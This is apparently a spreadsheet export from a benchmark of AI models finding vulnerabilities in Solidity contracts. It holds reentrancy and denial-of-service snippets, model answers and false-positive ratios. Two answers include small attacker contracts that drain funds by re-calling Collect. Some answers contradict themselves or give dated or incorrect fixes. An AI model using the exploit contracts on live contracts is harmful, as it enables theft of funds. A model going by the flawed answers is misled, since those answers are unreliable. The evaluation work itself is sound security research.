    - Using a loop to send refunds can cause gas limit issues, preventing users from getting their refunds.
    - A single failure during refund can stop all subsequent refunds from being processed.
4. The potential solutions to these vulnerabilities:
    - **For Reentrancy**: Use the Checks-Effects-Interactions pattern. Ensure that you first decrease the user's balance or remove them from the `refundAddresses` list before sending the funds.
    - **For Gas Limit Issues**: Instead of using a `for` loop to refund all users at once, consider implementing a `withdraw` pattern where users can individually claim their refunds. This will distribute the gas costs among individual users and prevent the contract from running out of gas.
    - **For Single Point of Failure with `require`**: Instead of using `require`, you can check the return value of the `send` method. If it's `false`, you can either skip that address or log the failure for manual intervention later, but continue processing the rest of the refunds.</t>
  </si>
  <si>
    <t>I will start by reading and analyzing the provided Solidity code to identify any vulnerabilities.
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - The `refundAll` function iterates over the `refundAddresses` array and tries to send funds to each address. The problem here is that the `send` function only provides 2300 gas, which might not be enough if the recipient is a contract that has a fallback function with more than 2300 gas usage. If sending fails for one address (e.g., due to a fallback function in a contract that consumes more than 2300 gas), the `require` statement will revert the entire transaction. This means that if one refund fails, all subsequent refunds in the loop will not be processed.
   - Using loops that iterate over a state variable of an arbitrary length is bad practice. As more addresses are added to `refundAddresses`, the `refundAll` function could eventually run out of gas, preventing any refunds from being processed.
3. **The business impact of these vulnerabilities in one sentence:**
   The `refundAll` function leads to potential funds lock-up and high gas costs, which can prevent users from receiving their refunds.
4. **The potential solutions to these vulnerabilities:**
   - Use the `transfer` method instead of `send` for a safer way to send ether. Although it also provides only 2300 gas, the `transfer` method will revert the transaction if it fails, making it clearer where the error is.
   - Instead of iterating over all addresses in the contract, consider creating a function that allows users to claim their refunds individually. This will distribute the gas cost to each user and prevent the potential gas limit issues. The function can look something like this:
     ```solidity
     function claimRefund() public {
         uint refundAmount = refunds[msg.sender];
         require(refundAmount &gt; 0, "No funds to refund");
         refunds[msg.sender] = 0;
         msg.sender.transfer(refundAmount);
     }
     ```
   - If there's a need to refund all users in a single transaction (e.g., by an admin), consider using patterns like the gas station network or meta transactions to mitigate gas limit issues. Another alternative is to break the refund process into multiple batches.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited: The vulnerability in the provided code is that it uses a loop to refund funds to multiple addresses, but it performs the refund one address at a time using the `.send()` function. If there is an error during the refund process for any of the addresses, the loop will be interrupted, and subsequent refunds won't occur. This could lead to some participants not receiving their refunds.
3. The business impact of this vulnerabilities in one sentence: This function leads to potential funds lock-up, where a single failed refund transaction prevents further refunds, causing inconvenience to users and potential loss of trust in the system.
4. The potential solutions of this vulnerabilities:
   - Use a pull-based mechanism: Instead of sending funds directly to each participant, allow them to withdraw their refunds on their own. This way, a single failed withdrawal won't affect others.
   - Implement a withdrawal pattern: Store the refund amounts in a mapping against each participant's address and allow them to initiate the withdrawal themselves.
   - Consider using a more robust refund mechanism: Depending on the use case, a batched refund approach or an escrow-based refund system might be more appropriate, ensuring a higher level of reliability and security.</t>
  </si>
  <si>
    <t>dataset/denial_of_service/auction.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function bid() payable {
    require(msg.value &gt; currentBid);
    if (currentFrontrunner != 0) {
      require(currentFrontrunner.send(currentBid));
    }</t>
  </si>
  <si>
    <t>Is there any vulnerabilities? No
Explain in details how this vulnerability can be exploited:
DosAuction Contract:
The DosAuction contract lacks a function to handle the process of outbidding and refunding the previous highest bidder. This absence means that when a new bid is placed, the previous frontrunner's bid is not refunded, potentially leading to a denial of service (DoS) attack. An attacker could repeatedly place bids with minimal increases, preventing legitimate users from participating effectively.</t>
  </si>
  <si>
    <t>1. **Is there any vulnerabilities?** Yes.
2. **Proof of concept of this vulnerability:** The code snippet shows a function `bid()` within a smart contract. The vulnerability arises from the use of `.send()` for sending Ether. The `.send()` method in Solidity is considered less safe compared to `.transfer()`, as it silently fails by returning `false` instead of throwing an exception if the transfer fails. This could potentially lead to scenarios where the logic of the contract assumes a successful transaction when, in fact, the transfer of Ether failed. Additionally, relying on `require(msg.value &gt; currentBid)` without resetting `currentBid` and `currentFrontrunner` immediately can lead to a situation where a malicious user could call the function repeatedly, causing the Ether transfer to the previous `currentFrontrunner` to revert due to the reentrancy attack.
3. **The business impact of this vulnerability in one sentence:** The usage of `.send()` and improper handling of state updates can lead to failed transactions and potential reentrancy attacks, compromising the contract's integrity and financial security.
4. **Potential solutions of this vulnerabilities:**
   - Replace `.send()` with `.transfer()`, which throws an error and reverts the transaction if the Ether transfer fails, ensuring more secure handling of funds.
   - Implement a withdrawal pattern where users withdraw their funds themselves instead of pushing Ether to them directly. This pattern minimizes the risks associated with transferring Ether and protects against reentrancy.
   - Update the contract's state (`currentBid` and `currentFrontrunner`) before sending Ether to prevent reentrancy attacks. This is known as the checks-effects-interactions pattern.
   - Consider adding additional checks and safety mechanisms, such as setting maximum bid limits or implementing time constraints, to further secure the contract against potential exploits.
Remember, smart contract security is critical, and thorough testing and auditing by experienced professionals are recommended to ensure the integrity and security of the contract.</t>
  </si>
  <si>
    <t>1. **Is there any denial of service vulnerabilities?** Yes.
2. **Proof of concept of this vulnerability:**
   In the `DosAuction` contract, there is a potential DoS vulnerability in the bid function (though the actual function implementation is not shown). The issue likely arises from the fact that when a new highest bid is placed, the contract must refund the previous frontrunner. If the refund transaction fails (e.g., if the frontrunner is a contract that rejects transactions), the entire bid function could fail. This means a malicious user could become the frontrunner with a bid, and then ensure that any refunds to their address fail, preventing any further bids and essentially locking the auction.
3. **The business impact of this vulnerability in one sentence:** 
   The DoS vulnerability in the `DosAuction` contract can lead to the auction being frozen, preventing legitimate bids and disrupting the auction process.
4. **Potential solutions to this vulnerability:**
   - Implement a withdrawal pattern (as seen in the `SecureAuction` contract) where bidders withdraw their funds themselves, rather than the contract sending refunds automatically. This pattern avoids the contract's dependence on the success of external transactions.
   - Ensure that all state changes occur before external calls to prevent reentrancy attacks, as demonstrated in the `withdraw` function of the `SecureAuction` contract.
   - For added security, consider adding checks to prevent contracts from bidding, or specifically design the auction contract to handle such cases safely.
   - Regularly audit and test the contract, especially focusing on exception handling and transaction failures, to ensure robustness against DoS attacks.</t>
  </si>
  <si>
    <t>1. **Is there any denial of service vulnerabilities?** Yes.
2. **Proof of Concept of this Vulnerability:**
   The vulnerability lies in the use of the `send` function within an if-statement. In Solidity, when the `send` function is used to transfer Ether, it only provides 2300 gas, which is often insufficient for more complex transactions. If the address of `currentFrontrunner` is a contract that requires more than 2300 gas to execute its fallback function, the `send` call will fail. This failure will cause the entire `bid` function to revert, effectively preventing any new bids from being accepted. Additionally, if `currentFrontrunner` is a malicious contract designed to fail the `send` intentionally, it can permanently lock the bidding process by ensuring that this line always reverts.
3. **The Business Impact of this Vulnerability in One Sentence:**
   The use of `send` function in a critical transaction flow leads to a potential denial of service (DoS), where new bids cannot be placed, disrupting the normal functioning of the bidding process.
4. **Potential Solutions of this Vulnerability:**
   - Replace `send` with `transfer` or `call`. While `transfer` automatically reverts on failure and provides the same gas stipend as `send`, `call` is more flexible but requires careful gas handling to avoid reentrancy attacks.
   - Implement a withdrawal pattern instead of sending Ether directly. In this pattern, the contract records the refunds owed and allows users to withdraw their funds in a separate transaction.
   - Include additional checks or mechanisms to handle the failure of the `send` operation gracefully, ensuring that the contract's core functionality remains unaffected even if the Ether transfer fails.
   - Use a state variable to mark the contract as 'paused' or in 'error state' when a critical transaction fails, allowing for administrative intervention or other fallback mechanisms.</t>
  </si>
  <si>
    <t>false positive ratio = 3/ (3+6)=0.33</t>
  </si>
  <si>
    <t>false positive ratio =0</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Collect(uint _am)
    public
    payable
    {
        if(balances[msg.sender]&gt;=MinSum &amp;&amp; balances[msg.sender]&gt;=_am)
        {
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                Log.AddMessage(msg.sender,_am,"Collect");
            }
        }
    }</t>
  </si>
  <si>
    <t>I will review the provided Solidity code to identify potential vulnerabilities. After that, I'll respond to your questions in the specified format. Let's get started by examining the content of the file.
After reviewing the provided Solidity code, here is the analysis:
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - **Reentrancy Attack**: The `Collect` function has a typical reentrancy vulnerability. It uses `msg.sender.call.value(_am)()` to send Ether before updating the user's balance. This means that a malicious contract can continuously call the `Collect` function before the balance is updated, essentially draining the contract's Ether.
   - **Missing access control**: The functions `SetMinSum`, `SetLogFile`, and `Initialized` lack appropriate access controls. Any user can call these functions. Without proper access control, this can lead to unintended behavior or exploitation.
   - **Potential for locking funds**: The function `Initialized` sets the `intitalized` variable to `true` but there is no function to set it back to `false`. Once `Initialized` is called, no one can change the `MinSum` or `LogFile` address, potentially locking funds or making the contract less adaptable to future changes.
   - **Potential typo**: There is a potential typo with the variable name `intitalized`. It might be intended to be `initialized`. This can lead to confusion in code maintenance.
3. **The business impact of these vulnerabilities in one sentence:**
   - **Reentrancy Attack**: The `Collect` function leads to potential loss of all contract funds.
   - **Missing access control**: Lack of access controls on key functions leads to potential misuse or unintended behavior.
   - **Potential for locking funds**: Once `Initialized` is called, the contract cannot adapt to future requirements, leading to locked funds or reduced functionality.
   - **Potential typo**: Typographical errors lead to maintenance issues and potential misunderstandings.
4. **The potential solutions of these vulnerabilities:**
   - **Reentrancy Attack**: Use the Checks-Effects-Interactions pattern. Always update state variables before interacting with external contracts or addresses.
   - **Missing access control**: Implement access control mechanisms like `onlyOwner` to restrict access to sensitive functions.
   - **Potential for locking funds**: Allow for a way to reset or update the `intitalized` state with proper access control.
   - **Potential typo**: Rename the `intitalized` variable to the correct spelling of `initialized` and make sure to update all references in the code.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
    - **Reentrancy attack:** The function deducts the amount from the `balances` after sending the ether to `msg.sender`. This order of operations allows for a reentrancy attack. A malicious contract can call the `Collect` function recursively before the `balances` is updated, thus draining more ether than they should be allowed.
3. The business impact of these vulnerabilities in one sentence:
    - **The `Collect` function leads to unauthorized withdrawal of funds due to reentrancy.**
4. The potential solutions of these vulnerabilities:
    - **Update the balance first:** Before sending any funds, decrease the balance of the `msg.sender`. This ensures that even if a reentrancy attack is attempted, the attacker cannot withdraw more than their balance.
    - **Use the `reentrancyGuard` modifier:** There are standard practices and modifiers like `reentrancyGuard` that can be utilized to prevent reentrancy attacks in Solidity contracts.
    - **Use `address.transfer` or `address.send` instead of `call.value()`:** While `address.transfer` and `address.send` have their own limitations, they are safer against reentrancy attacks because they have a gas limit that prevents the called contract from performing certain operations, including calling back into the calling contract.</t>
  </si>
  <si>
    <t>Alright, I will start by reading and analyzing the provided Solidity code for any reentrancy vulnerabilities. Let's first take a look at the content of the file.
After analyzing the code, here's the breakdown:
1. **Are there any reentrancy vulnerabilities?** 
No.</t>
  </si>
  <si>
    <t>1. Yes, there are reentrancy vulnerabilities.
2. how this vulnerability can be exploited :
The function uses the `msg.sender.call.value(_am)()` method to send ether to the caller before deducting the sent amount from the `balances[msg.sender]`. A malicious actor can exploit this by making a fallback function in their contract that calls the `Collect` function again before the `balances[msg.sender]-=_am;` line is executed. This will result in the attacker being able to withdraw more than their balance.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to unauthorized withdrawal of funds.
4. The potential solutions of these vulnerabilities:
a. Use the "Checks-Effects-Interactions" pattern. Deduct the balance before making the external call.
b. Use the `transfer` or `send` methods instead of `call.value()`. They are safer against reentrancy attacks because they only forward a limited amount of gas. 
Modified code with the "Checks-Effects-Interactions" pattern:
```solidity
function Collect(uint _am) public payable {
    require(balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am, "Insufficient funds or below minimum withdrawal amount");
    balances[msg.sender] -= _am;
    if (!msg.sender.send(_am)) {
        balances[msg.sender] += _am;  // Revert the balance change if the transfer fails.
    }
    Log.AddMessage(msg.sender, _am, "Collect");
}
```
In this modified code, the balance is deducted before making the external call, thus preventing reentrancy attacks.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function CashOut(uint _am)
    {
        if(_am&lt;=balances[msg.sender])
        {            
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                TransferLog.AddMessage(msg.sender,_am,"CashOut");
            }
        }
    }</t>
  </si>
  <si>
    <t>Alright, I'll start by examining the provided Solidity code to determine if there are any vulnerabilities present.
Upon reviewing the provided Solidity code, here are my findings:
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - **Reentrancy Vulnerability**: The function `CashOut` is vulnerable to a reentrancy attack. This is due to the fact that it sends ether (`msg.sender.call.value(_am)()`) to the caller before updating the internal state (`balances[msg.sender]-=_am;`).
   - **Use of `call.value()()`**: The use of the `call.value()()` method for transferring Ether can introduce potential reentrancy attacks.
   - **No Access Control on `AddMessage` in `Log` contract**: The `AddMessage` function in the `Log` contract does not have any access control, meaning any external entity can call it and possibly spam the contract's storage.
3. The business impact of these vulnerabilities in one sentence:
   - **Reentrancy Vulnerability**: This vulnerability allows malicious actors to drain funds from the contract.
   - **No Access Control**: Malicious entities can spam the contract's storage, leading to bloated and more costly contract interactions.
4. The potential solutions for these vulnerabilities:
   - **Reentrancy Vulnerability**: Update the internal state before sending ether to prevent reentrancy. That is, the order should be:
     ```solidity
     balances[msg.sender] -= _am;
     msg.sender.call.value(_am)();
     ```
   - **Use of `call.value()()`**: Use the `transfer()` or `send()` methods for sending Ether as they are considered safer against reentrancy attacks.
   - **No Access Control**: Implement access control for the `AddMessage` function in the `Log` contract to ensure only authorized entities can call it. This can be achieved by adding a modifier that checks if the caller is the `PrivateBank` contract or any other authorized entity.
Note: The code might have other potential vulnerabilities which are not evident from this short extract, and a deeper, more thorough analysis might be required for a complete security audit.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
- **Reentrancy Attack**: The function first sends Ether to `msg.sender` before updating the `balances` mapping. This means that if the call to `msg.sender` is a malicious contract that calls `CashOut` again before the original call is completed, it could drain more Ether than it should.
3. The business impact of these vulnerabilities in one sentence:
- **Reentrancy Attack**: The `CashOut` function leads to funds being drained from the contract.
4. The potential solutions of these vulnerabilities:
- **Reentrancy Attack**: 
  - Always update state variables (`balances[msg.sender]` in this case) before sending Ether. This ensures that even if a reentrancy occurs, the function won't send more Ether than intended.
  - Use the `reentrancyGuard` modifier or a similar mechanism to prevent recursive calls to the function.
  - Instead of sending Ether directly, consider using a withdrawal pattern where users can request a withdrawal and then later pull their funds from the contract. This separates the accounting from the actual transfer of funds.</t>
  </si>
  <si>
    <t>Alright, let's first read the provided Solidity code to analyze it for potential reentrancy vulnerabilities.
After reading the provided Solidity code, let's break it down and analyze it for potential reentrancy vulnerabilities.
**Analysis:**
The code comprises two main contracts:
1. `PrivateBank` 
2. `Log`
The primary functions of interest are `Deposit()` and `CashOut(uint _am)` inside the `PrivateBank` contract. 
1. Are there any reentrancy vulnerabilities?
The answer is **yes**.
2. how this vulnerability can be exploited :
The vulnerability lies in the `CashOut(uint _am)` function. Specifically, the line `if(msg.sender.call.value(_am)())` sends ether to the caller before deducting the amount from the caller's balance (`balances[msg.sender]-=_am;`). An attacker could exploit this vulnerability by making a recursive call to the `CashOut` function from a fallback function in another contract. This would allow the attacker to withdraw more funds than they have in their balance.
3. The business impact of these vulnerabilities in one sentence:
The `CashOut` function leads to potential theft of funds due to incorrect order of ether transfer and balance update.
4. The potential solutions to this vulnerability:
- **Solution 1:** Update the user's balance before sending them the ether. This ensures that even if a reentrancy attack is attempted, the attacker's balance would already be reduced, preventing them from withdrawing more funds.
  Change:
  ```solidity
  if(msg.sender.call.value(_am)())
  {
      balances[msg.sender]-=_am;
      ...
  }
  ```
  To:
  ```solidity
  balances[msg.sender]-=_am;
  if(!msg.sender.call.value(_am)())
  {
      balances[msg.sender]+=_am;
      ...
  }
  ```
- **Solution 2:** Use the `transfer()` or `send()` method instead of the `call.value()` method to send ether. These methods are safer against reentrancy attacks because they only provide a limited amount of gas to the receiving contract, which prevents recursive calls. The downside is that they might not work with all contracts, especially those that have a gas-intensive fallback function.
  Change:
  ```solidity
  if(msg.sender.call.value(_am)())
  {
      ...
  }
  ```
  To:
  ```solidity
  msg.sender.transfer(_am);
  ```
- **Solution 3:** Implement a mutex (or reentrancy guard) to prevent the function from being re-entered while it's still executing.
Using a combination of the above solutions can further enhance the security of the contract.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The line `if(msg.sender.call.value(_am)())` sends ether to the address specified by `msg.sender` before the balance of `msg.sender` is updated in the line `balances[msg.sender]-=_am;`. This order of operations allows a malicious contract to be set up as `msg.sender` and to call the `CashOut` function recursively while it's still being executed. This means the malicious contract can drain more ether than it should be allowed to.
3. The business impact of these vulnerabilities in one sentence:
The `CashOut` function leads to unauthorized withdrawal of funds due to reentrancy.
4. The potential solutions of this vulnerability:
- Use the Checks-Effects-Interactions pattern. Update the state variables before sending out any ether.
- Consider using the `reentrancyGuard` modifier or a similar pattern that prevents recursive calls.
- Utilize the `transfer` or `send` functions instead of `call.value` for sending ether, as they inherently limit the gas forwarded and prevent fallback functions from executing long operations.
Updated function with the Checks-Effects-Interactions pattern:
```solidity
function CashOut(uint _am)
{
    require(_am &lt;= balances[msg.sender], "Insufficient balance");
    // Effects
    balances[msg.sender] -= _am;
    // Interactions
    msg.sender.transfer(_am);
    TransferLog.AddMessage(msg.sender, _am, "CashOut");
}
``` 
This update ensures that the balance is deducted before any ether is transferred, mitigating the reentrancy vulnerability.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code to identify any potential vulnerabilities. After the review, I will respond in the format you provided.
I have reviewed the provided Solidity code. Let's address your requirements:
1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
   a. **Unrestricted Write Access**: The functions `SetMinSum`, `SetLogFile`, and `Initialized` can be called by any Ethereum address. There are no access controls in place to ensure that only the contract owner or an authorized person can make these changes.
   b. **Reentrancy Attack**: The `Collect` function is vulnerable to a reentrancy attack because it calls an external contract (`msg.sender.call.value(_am)()`) before updating the state (`balances[msg.sender]-=_am;`).
   c. **Outdated Compiler Version**: The contract uses `pragma solidity ^0.4.19;` which is an old and potentially vulnerable version of the Solidity compiler.
3. The business impact of these vulnerabilities in one sentence:
   a. **Unrestricted Write Access**: Any attacker can change the `MinSum`, `Log` address, and initialization state leading to potential loss or freezing of funds.
   b. **Reentrancy Attack**: An attacker can drain the contract's funds through recursive calls.
   c. **Outdated Compiler Version**: Using an old compiler exposes the contract to known vulnerabilities and exploits.
4. The potential solutions of these vulnerabilities:
   a. **Unrestricted Write Access**: Implement access controls such as an `onlyOwner` modifier to restrict who can call these functions.
   b. **Reentrancy Attack**: Use the Checks-Effects-Interactions pattern. Update the state (balances) before interacting with external contracts or addresses.
   c. **Outdated Compiler Version**: Update the contract to use a more recent and stable version of the Solidity compiler and ensure to fix any breaking changes. Also, regularly review and update the compiler version to ensure it's always using the latest stable release.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The function uses the pattern where it sends Ether with `msg.sender.call.value(_am)()` before updating the state `balances[msg.sender]-=_am;`. This opens up the function to reentrancy attacks.
3. The business impact of these vulnerabilities in one sentence:
- The `Collect` function leads to potential loss of Ether due to reentrancy attacks.
4. The potential solutions to these vulnerabilities:
- Update the state before sending Ether. This means you should adjust the `balances[msg.sender]-=_am;` line before the `if(msg.sender.call.value(_am)())` line.
- Use the `reentrancyGuard` modifier, which is a common practice to prevent reentrancy attacks in Solidity.
- Prefer using the `transfer` or `send` methods instead of the `call.value()` method to send Ether, as these methods have a gas limit which makes them less prone to reentrancy. However, if you need to use `call.value()`, ensure you implement appropriate safeguards against reentrancy.</t>
  </si>
  <si>
    <t>Are there any reentrancy vulnerabilities?
Answer: Yes.
how this vulnerability can be exploited :
An attacker can exploit the Collect function by using its call method to recursively call the function again before the sender's balance is updated, allowing for multiple withdrawals.
The business impact of these vulnerabilities in one sentence:
The Collect function leads to unauthorized withdrawal of funds due to reentrancy.
The potential solutions of these vulnerabilities:
Update the user's balance in the Collect function before making external calls to prevent reentrancy attacks.</t>
  </si>
  <si>
    <t>1. **Are there any reentrancy vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The vulnerability exists because the contract sends Ether with `msg.sender.call.value(_am)()` before it updates the internal state `balances[msg.sender]-=_am;`. An attacker can create a fallback function in their contract which calls the `Collect` function again when it receives Ether. This would allow the attacker to drain more Ether than their balance would allow because the internal state hasn't been updated yet.
   Example malicious contract:
   ```solidity
   contract Attack {
       Target target;
       constructor(address _target) public {
           target = Target(_target);
       }
       function startAttack(uint _am) public {
           target.Collect(_am);
       }
       // Fallback function
       function() external payable {
           if (address(target).balance &gt; 0) {
               target.Collect(msg.value);
           }
       }
   }
   ```
3. **The business impact of these vulnerabilities in one sentence:**
   The `Collect` function leads to unauthorized withdrawals of funds.
4. **The potential solutions to these vulnerabilities:**
   - Update the internal state before sending Ether.
   - Use the `transfer` or `send` methods instead of `call.value()`. These methods are limited in gas, preventing reentrant calls.
   - Implement a mutex or reentrancy guard to prevent recursive calls to the function.
   Modified code using the first solution:
   ```solidity
   function Collect(uint _am) public payable {
       if (balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am) {
           balances[msg.sender] -= _am;
           if (!msg.sender.call.value(_am)()) {
               balances[msg.sender] += _am; // Revert the balance if the transfer fails.
           } else {
               Log.AddMessage(msg.sender, _am, "Collect");
           }
       }
   }
   ```</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function Collect(uint _am)
    public
    payable
    {
        if(balances[msg.sender]&gt;=MinSum &amp;&amp; balances[msg.sender]&gt;=_am)
        {
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                Log.AddMessage(msg.sender,_am,"Collect");
            }
        }
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
   **Answer**: Yes.
2. how this vulnerability can be exploited :
   - An attacker can call `SetMinSum` or `SetLogFile` before the contract is initialized, leading to unauthorized control.
   - In the `Collect` function, the use of the `call` method before updating the sender's balance allows for a reentrancy attack.
3. The business impact of these vulnerabilities in one sentence:
   - Unauthorized modification leads to loss of control over the contract settings.
   - Reentrancy attack leads to unauthorized withdrawal of funds.
4. The potential solutions of these vulnerabilities:
   - Ensure that important parameters like `MinSum` and `Log` can only be set once or by only a trusted party (like the contract owner).
   - Update the user's balance in the `Collect` function before making external calls to prevent reentrancy attacks.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability exists in the line:
\[
\text{{if(msg.sender.call.value(\_am)())}}
\]
This line sends Ether to the caller's address before updating the balance in the next line. An attacker can use this vulnerability to recursively call the `Collect` function before the balance is updated, effectively draining more Ether than their actual balance.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function allows for repeated withdrawals, potentially leading to a loss of funds.
4. The potential solutions of this vulnerabilities:
- Update the user's balance before making the external call.
- Use the `transfer` or `send` method instead of `call.value()`, as they have a gas limit that prevents reentrancy.
- Implement checks-effects-interactions pattern, i.e., first perform all internal state changes and only afterwards interact with external contracts.
Here's a safer version of the function:
```solidity
function Collect(uint _am) public payable {
    require(balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am, "Insufficient balance or below minimum withdrawal.");
    // Update the user's balance first
    balances[msg.sender] -= _am;
    // Then transfer the amount
    (bool success, ) = msg.sender.call.value(_am)("");
    require(success, "Transfer failed.");
    Log.AddMessage(msg.sender, _am, "Collect");
}
```
Note: While `transfer` and `send` are considered safer against reentrancy attacks, they have their own limitations. Using them may lead to problems if the receiving contract's fallback function consumes more than the stipulated gas (2300 gas). Hence, if using `call.value()`, always ensure you follow the checks-effects-interactions pattern.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability in this code is a reentrancy attack. The following sequence of events can exploit this vulnerability:
- The condition `balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am` checks if the sender has enough balance.
- The contract then tries to send the amount `_am` to `msg.sender` using the call method: `msg.sender.call.value(_am)()`.
- However, before updating the sender's balance with `balances[msg.sender] -= _am;`, the contract sends the ether. This means if the recipient is a malicious contract, it can call the `Collect` function again before the user's balance is deducted, leading to a reentrancy attack.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to unauthorized withdrawal of funds due to a reentrancy attack.
4. The potential solutions of this vulnerabilities:
- Update the user's balance before transferring the funds. This would prevent the reentrancy attack as the balance would be deducted before any funds are sent.
- Use the `transfer` or `send` method instead of `call.value()`. These methods are considered safer against reentrancy attacks as they only forward a limited amount of gas.
- Implement a reentrancy guard, which is a pattern that prevents a contract from being re-entered during its execution.
Modified code with the first solution:
```solidity
function Collect(uint _am) public payable {
    if(balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am) {
        balances[msg.sender] -= _am;
        if(msg.sender.call.value(_am)()) {
            Log.AddMessage(msg.sender, _am, "Collect");
        } else {
            balances[msg.sender] += _am; // Refund in case of failure
        }
    }
}
```
Note: Even with these changes, it's essential to always test smart contracts thoroughly and potentially have them audited by professionals.</t>
  </si>
  <si>
    <t>dataset/reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol</t>
  </si>
  <si>
    <t>function Collect(uint _am)
    public
    payable
    {
        if(balances[msg.sender]&gt;=MinSum &amp;&amp; balances[msg.sender]&gt;=_am)
        {
            if(msg.sender.call.value(_am)())
            {
                balances[msg.sender]-=_am;
                Log.AddMessage(msg.sender,_am,"Collect");
            }
        }
    }</t>
  </si>
  <si>
    <t>Alright, I will review the provided Solidity code and analyze it for vulnerabilities.
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - The `throw` statement is deprecated in later versions of Solidity. It has been replaced by `revert()`, `require()`, and `assert()`. The lines with `if(intitalized)throw;` will not be compatible with newer Solidity versions.
   - The `call.value()` method is potentially unsafe. Using `call.value()` without `{gas: ...}` limits the amount of gas sent with the call. If not handled properly, it can introduce reentrancy vulnerabilities. This issue is found in the `Collect` function: `if(msg.sender.call.value(_am)())`.
   - The fallback function directly calls another function (`Deposit`). This might lead to unforeseen issues, especially with the gas limit for fallback functions.
   - The contract allows setting `MinSum` and `LogFile` without any access control, meaning anyone can call the `SetMinSum` and `SetLogFile` functions before the contract is initialized.
   - There is no access control on the `Initialized` function. This means any external actor can call this function and set `intitalized` to true.
3. **The business impact of these vulnerabilities in one sentence:** 
   - Deprecated `throw` statement leads to potential contract incompatibilities with newer Solidity versions.
   - Unsafe `call.value()` method leads to potential reentrancy attacks.
   - Lack of access control on initialization functions leads to unauthorized contract setup.
4. **The potential solutions of these vulnerabilities:**
   - Replace `throw` with `revert()`, `require()`, or `assert()` as appropriate.
   - Use the safer `transfer()` or `send()` methods instead of `call.value()`. If `call.value()` must be used, ensure that state changes (`balances[msg.sender]-=_am;`) are done before external calls to prevent reentrancy.
   - Add an access control mechanism (like `onlyOwner`) to the `SetMinSum`, `SetLogFile`, and `Initialized` functions to ensure only authorized addresses can call them.
   - Consider restructuring the fallback function to avoid complex logic and ensure it remains within the gas limit.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability in the code is the "reentrancy attack" or "recursive call attack". This is due to the fact that the contract updates the user's balance after sending the funds. An attacker can create a fallback function in their contract that calls `Collect` again before the initial call to `Collect` completes. This would allow them to withdraw more funds than they should.
Here's a basic example of what the attacker's contract might look like:
```solidity
contract Attacker {
    TargetContract target;
    constructor(address _targetAddress) {
        target = TargetContract(_targetAddress);
    }
    function attack() public payable {
        target.Collect(msg.value);
    }
    fallback() external payable {
        if (address(target).balance &gt; 0) {
            target.Collect(msg.value);
        }
    }
}
```
When the `attack` function is called, it will trigger the `Collect` function of the target contract. When the target contract tries to send funds to the attacker's contract, the fallback function is called. The fallback function will again call the `Collect` function of the target contract, resulting in a reentrancy attack.
3. The business impact of these vulnerabilities in one sentence:
The `Collect` function leads to funds being drained from the contract more than the intended amount.
4. The potential solutions to these vulnerabilities:
a. Use the Checks-Effects-Interactions pattern: This means you should make all the checks (like balance checks) first, then make all the changes to the state variables, and finally interact with other contracts (like sending funds).
Here's how the function should be updated:
```solidity
function Collect(uint _am)
    public
    payable
{
    require(balances[msg.sender] &gt;= MinSum &amp;&amp; balances[msg.sender] &gt;= _am, "Insufficient balance");
    balances[msg.sender] -= _am;
    (bool success, ) = msg.sender.call{value: _am}("");
    require(success, "Transfer failed");
    Log.AddMessage(msg.sender, _am, "Collect");
}
```
b. Consider using the `transfer` or `send` method instead of `call.value()()`. These methods are limited in the amount of gas that can be forwarded, which can prevent reentrancy attacks. However, they come with their own set of considerations and potential issues, so it's important to understand the differences and choose the right method for your use case.
